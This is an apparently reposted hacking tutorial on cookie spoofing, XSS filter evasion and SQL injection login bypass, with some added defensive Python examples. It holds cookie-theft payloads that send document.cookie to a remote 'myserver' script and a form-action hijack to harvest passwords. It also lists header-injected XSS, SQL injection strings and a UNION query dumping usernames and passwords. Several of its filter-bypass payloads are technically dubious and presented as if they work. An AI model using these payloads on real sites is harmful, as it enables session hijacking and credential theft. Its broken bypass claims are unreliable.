admin 2012-9-13 17:12:29

XSS & SQL Injection

Author: CyberPhreak


XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X Web Security - XSS & more X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


~ Introduction

In this article I will cover XSS and the knowledge around it. By the end of this document you should understand what XSS is, why it is used, and how it is used. Once you have learned that, you will be able to check your own code and patch the simpler XSS holes. XSS is a very common class of vulnerability, and PHP does not filter input for you, so preventing XSS depends on your own methods. I will also discuss a few web security topics beyond XSS.

XXXXXXXXXXXXXXXXXXXXX
X Table OF Contents X
XXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXX
X Cookie Editing X
X XSS X
X SQL Injection X
XXXXXXXXXXXXXXXXXXXX

~ What is a cookie

A cookie is a small file. When you register an account on a site and log in, a cookie is set to record your login information. The site reads that information to know whether you are currently logged in; if not, it asks for your username and password again and logs you in. Think of a nightclub: you buy a ticket once and they give you a stamp, so you do not have to buy a ticket every time you come back in. Cookies can hold far more than that, and while the club only remembers you for a night, a cookie can remember you for a year.

~ Cookie editing & spoofing

So now you know what a cookie is... what is it good for? Cookie editing (modification) is one of the simplest techniques there is. All you need is a browser, which can view and edit cookies, and a little JavaScript knowledge. Go to a site, log in, and type javascript:alert(document.cookie) in the address bar. You should see something like a username. Many sites today use sessions rather than cookies; sessions cannot be edited this way (as far as I know), but cookies can, and by editing a cookie you can spoof who you are. Let's start spoofing... Suppose the alert shows something like:

strusername=cnsst;strpassword=cnsst

Now suppose you know that 'bitch' is an administrator account, but you do not know the password. With security this weak you do not need one: javascript:void(document.cookie="strusername=bitch")
Then check again with javascript:alert(document.cookie). That is basic cookie editing...
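The cookie above is trusted exactly as the browser sends it, which is why editing strusername works. The following is an added example, not code from the article: a Python sketch of the vulnerable check beside a version that signs the cookie with an HMAC so an edited value is rejected (SECRET is a placeholder; the cookie strings are constructed from the article's sample).

```python
import hmac
import hashlib

# SECRET is a placeholder for this demo; a real server loads it from configuration.
SECRET = b"placeholder-server-secret"

def parse_cookie(header: str) -> dict:
    """Split 'k=v;k=v' into a dict, the shape shown in the article."""
    pairs = (part.split("=", 1) for part in header.split(";") if "=" in part)
    return {k.strip(): v.strip() for k, v in pairs}

def user_from_cookie_trusting(header: str) -> str:
    """What the vulnerable site does: believe whatever strusername says."""
    return parse_cookie(header).get("strusername", "")

def sign(username: str) -> str:
    """HMAC-SHA256 over the username, keyed with the server secret."""
    return hmac.new(SECRET, username.encode(), hashlib.sha256).hexdigest()

def make_signed_cookie(username: str) -> str:
    """Cookie as the server would issue it after a real login."""
    return f"strusername={username};sig={sign(username)}"

def user_from_cookie_verified(header: str) -> str:
    """Accept strusername only if the signature was produced by this server."""
    c = parse_cookie(header)
    name, sig = c.get("strusername", ""), c.get("sig", "")
    if name and hmac.compare_digest(sign(name), sig):
        return name
    return ""

if __name__ == "__main__":
    original = make_signed_cookie("cnsst")
    # Constructed tampering: the client edits the name exactly as in the article.
    edited = original.replace("strusername=cnsst", "strusername=bitch")
    print(user_from_cookie_trusting(edited))   # the edit is believed
    print(user_from_cookie_verified(edited))   # empty: signature no longer matches
```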

~ What is XSS

XSS, or CSS, whichever you prefer to call it, stands for cross-site scripting. It means injecting a script by whatever means is available; that is the core of it. Through XSS you can also intercept information such as usernames, passwords and cookies. There is a lot more you can do with it, but this article should be enough for you to check your own code against XSS.

~ Why use XSS

Obviously, XSS lets you run any kind of script on the client side or the server side. XSS by itself only executes a script, but with that script you can capture passwords. Take an input like: <input name="name" type="name">
With XSS you can capture what is typed into it and send it to a file on a site you control. Once you study XSS you will discover the rest for yourself. XSS can also capture cookies, and cookies may hold valuable information: usernames, passwords and so on.

~ Let's get started

I assume you know HTML and JavaScript; PHP knowledge helps but is not required. We start with a PHP script.

XSS -- cross-site scripting:

<html>
<body>
<form action="" method="GET">
<!-- I use GET because I am used to it. -->
Script: <input name="name" type="name">
<input type="submit" value="submit">
</form>
</body>
</html>

<?php
$name = $_GET['name'];
echo("Hello $name");
?>
OK, you should be able to tell what this code does... a very simple script that nobody would use on a real site (I hope), but useful for learning the principle. Enter your name and you get:

cnsst
"Hello cnsst!"

Whatever you enter is echoed straight back.. Now watch what happens when you enter:
<script>alert(document.cookie)</script>

It pops up document.cookie! That is XSS!

You now know a little about XSS, but not much. At this point you could take any script, paste it in and it runs.... any script at all. Wait, any script? That raises the question: do you know the difference between client side and server side? Let me tell you. Client side is what runs on the client machine: JavaScript, HTML, VBScript and so on...

Server side, on the other hand, does not run on the client machine but on the server: PHP, ASP and so on...

Some people inject PHP, which I will cover later. Many will ask: inject JavaScript? Yes. When building a website, any website, JavaScript (JS) is used or has been used at some point. Any other script works too, because a site vulnerable to XSS only needs some kind of script to run.

Let's look at something slightly more complex!

You already know <script>alert(document.cookie)</script>, but what if the output you get back is:
scriptalert(document.cookie)/script
or even:
scriptalertdocument.cookie/script

As you can see... there are many ways to defeat XSS, and this is just one of them, one of the most common. All the "<>" characters have been stripped out.

So try this:
<<script>>alert(document.cookie)<</script>>

and you get document.cookie.

Similarly, when the parentheses are stripped too:
<<script>>alert((document.cookie))<<//script>>


But a filter may strip more than one layer, not just a single "<>". If one extra layer does not execute, add another one. For example, when you see:
scriptalertdocument.cookie/script
<<<script>>>alert(document.cookie)<<</script>>>

Instead of stripping twice, a filter may remove certain letters. For example, you enter:
<script>alert(document.cookie)</script>

and it becomes: srplert(document.cookie)srp

Look carefully and you will notice that nothing inside document.cookie was replaced. Why? Because the filter does not know what you intend to alert or what you want to do; it is only guessing, and it only strips "<>" and the characters of "script". So how do you get past it? Try:
<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>

The doubled characters are exactly the ones that get stripped! Simple logic!

Another filter also strips characters, but a different set of them! You enter:
<script>alert(document.cookie)</script>

and it becomes:
scriptalert(document.cookie)script

Now you say excitedly, "I know how to handle this!" OK, apply the earlier trick again:
<<script>>alert(document.cookie)<</script>>

Result: scriptalert(document.cookie)script. Still no "<>". This filter strips every "<>" and "/", no matter how many you send... did I say "every"? Try putting each token on its own line instead:

<
script
>
alert
(
document
.
cookie
)
<
/
script
>


Now suppose the filter does not strip "<>" at all but strips keywords instead. Write a payload without "<>", watch what gets replaced, and you will see why. A stricter filter replaces whole words of any kind, such as "alert"! What then? Try:
<
s
c
r
i
p
t
>
a
l
e
r
t
(
d
o
c
u
m
e
n
t
.
c
o
o
k
i
e
)
<
/
s
c
r
i
p
t
/
>

That should do it. Even when "<" is stripped, doubling it as "<< >>" gets through (any of these variations ends up retrieving document.cookie).

There are more filter variations I could show, but these should be enough for you to find your own mistakes.
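The filters above all fail for the same reason: they strip a blacklist in one pass and then echo the rest as live HTML. As an added example (not code from the article), the Python below rebuilds the "Hello $name" page with such a filter, shows a nested payload reassembling itself after one pass (the same idea as the article's doubled <<script>> payloads, generalised to nested tags), and shows that output encoding neutralises every variant.

```python
import html

# Blacklist of the kind the article's filters use; constructed for this demo.
BLACKLIST = ("<script>", "</script>")

def strip_blacklist(value: str) -> str:
    """The flawed defence: delete blacklisted tags in one non-recursive pass
    (the Python equivalent of calling str_replace once in PHP)."""
    for token in BLACKLIST:
        value = value.replace(token, "")
    return value

def render_filtered(name: str) -> str:
    """Echo the name after the blacklist filter: still reflects raw HTML."""
    return "Hello " + strip_blacklist(name)

def render_encoded(name: str) -> str:
    """The real fix: encode for the HTML text context instead of blacklisting."""
    return "Hello " + html.escape(name, quote=True)

def contains_script_tag(page: str) -> bool:
    """Did a live <script> tag survive into the rendered page?"""
    return "<script>" in page.lower()

if __name__ == "__main__":
    plain = "<script>alert(document.cookie)</script>"
    # Constructed probe: the forbidden token nested inside itself. One pass
    # removes the inner copy and the outer copy is reassembled.
    nested = "<scr<script>ipt>alert(document.cookie)</scr</script>ipt>"
    for probe in (plain, nested):
        page = render_filtered(probe)
        print(page, "-> script tag present:", contains_script_tag(page))
        page = render_encoded(probe)
        print(page, "-> script tag present:", contains_script_tag(page))
```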

That covers client-side XSS. Having dealt with the client side, let's now look at server-side XSS.

Recall the difference between the two. The client side handles JavaScript (JS), VBScript (VBS) and the like. Server-side XSS targets server-side code: PHP, ASP and so on. Client-side code can be seen by viewing the page source; server-side code cannot.

You have learned client-side XSS; the next step is injecting a script. Note that you first need to find a script on the site that can be XSSed. Say the site lets you post an article and you want to capture a password through XSS. Why should it be JavaScript? Why not PHP? Let me show you something.
document.forms(0).action="http://myserver/myscript.php"
It makes no difference whether the script runs on the server or the client. Your script receives the form data and does something with it, for example storing it in a *.txt file on your site.

Suppose again that you have registered an account on the site. The cookie can also be fetched remotely...
document.images(0).src="http://myserver/cookie.php"+document.cookie
Anything that can point at a remote resource can be used to send data, for example:
javascript:location.href="http://myserver/cookie.php"+document.cookie
This captures the cookie of every user who visits. It works anywhere, as long as there is one place to inject it.

Sometimes a site displays the User-Agent or Referer it received... From a DOS prompt you can send some XSS in those headers:
telnet example.com 80
GET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
Host: example.com
User-Agent: <script>alert(document.cookie)</script>
Referer: <script>alert(document.cookie)</script>
~ What is SQL injection

SQL injection is one of the biggest threats to website security. So what is SQL injection? It is injecting SQL, much as XSS injects script, and it targets a different kind of hole. Here is a typical login page:

<html>
<body>
<form action="" method="POST">
Username: <input name="name" type="name">
Password: <input name="password" type="password">
<input type="submit" value="Submit">
</form>
</body>
</html>
Good. Even if this page had an XSS hole, that is not what we want here; XSS gives no way to get the password. So what do we do? SQL injection!

The simplest test is to enter "'" as the username. If it is not filtered, you should get an error message. That error shows the input reached the database, which means it can be injected. If the error message says nothing useful, you do not know yet. So here is the list of injection strings I use until one of them produces a useful error:

'='
'OR 1=1--
'OR a=a--
'OR'

Since these were first published they have become easy to find, but the ones below are overlooked on many security lists:

'OR''='
'OR"="
'OR'="
'OR '="
'OR "='
'OR ''='
'OR '=''
'OR "=''
'OR ''="
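Why these strings work against the login form above, and what closes the hole, as an added example that is not code from the article: a Python stand-in for the form handler, using an in-memory SQLite table with constructed rows, first building the query by string concatenation and then with bound parameters.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """In-memory users table with constructed sample rows (plaintext
    passwords only to keep the demo short)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("cnsst", "hunter2")])
    return conn

def login_concat(conn, username: str, password: str) -> list:
    """Vulnerable: user input is spliced into the SQL text."""
    sql = ("SELECT username FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return [row[0] for row in conn.execute(sql)]

def login_param(conn, username: str, password: str) -> list:
    """Fixed: same query with bound parameters; input is data, never SQL."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]

def error_from_quote(conn) -> str:
    """The article's lone "'" test: the quote breaks the statement, and the
    database error is what leaks if the application displays it."""
    try:
        login_concat(conn, "'", "")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return ""

if __name__ == "__main__":
    conn = make_db()
    probe = "'OR''='"   # one of the strings listed in the article
    # Concatenated: WHERE username=''OR''='' AND password=''OR''='' is always true.
    print(login_concat(conn, probe, probe))
    print(login_param(conn, probe, probe))        # []: nothing matches the literal
    print(login_param(conn, "admin", "s3cret"))   # ['admin']: normal login still works
    print(error_from_quote(conn))
```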


~ UNION ALL SELECT
UNION ALL SELECT appends the rows of a second query to the result of the first, so it lets you pull columns of your choosing out of another table in the database... for example:
UNION ALL SELECT username,password FROM users

The query will be executed, right? But what about the WHERE clause?
UNION ALL SELECT username,password FROM users WHERE username='OR "='
AND password='OR "='

Use the string 'OR "=' to neutralise the WHERE condition. At first glance, how would you know the table and column names? In fact, once you find an SQL hole, the error messages leak information about the tables and columns.

Once a hole is found, people habitually inject 'OR "=' to get in. To pull something useful out of a table you then have to match the number of columns the original query selects, without knowing what they are. The query below repeats ip 20 times to match 20 columns while trying to read a list of IPs from a logs table:
UNION ALL SELECT
ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
WHERE ip='OR''="

See how it works? (assuming the injection goes through). Now take a URL like:
http://example.com/index.php?article=34
This shows the article with id 34... replace 34 with "'":
http://example.com/index.php?article='


Now, remember what I said: many people do not realise how unsafe an unfiltered ' is, and different injection strings can be used in its place. Some examples:
http://example.com/index.php?article='
http://example.com/index.php?article='='
http://example.com/index.php?article='OR 1=1--
http://example.com/index.php?article='OR a=a--
http://example.com/index.php?article='OR '="
http://example.com/index.php?article='OR "='
http://example.com/index.php?article='OR ''='
http://example.com/index.php?article='OR '=''
http://example.com/index.php?article='OR''='
http://example.com/index.php?article='OR"'='
http://example.com/index.php?article='OR"''='

Go and find your own mistakes!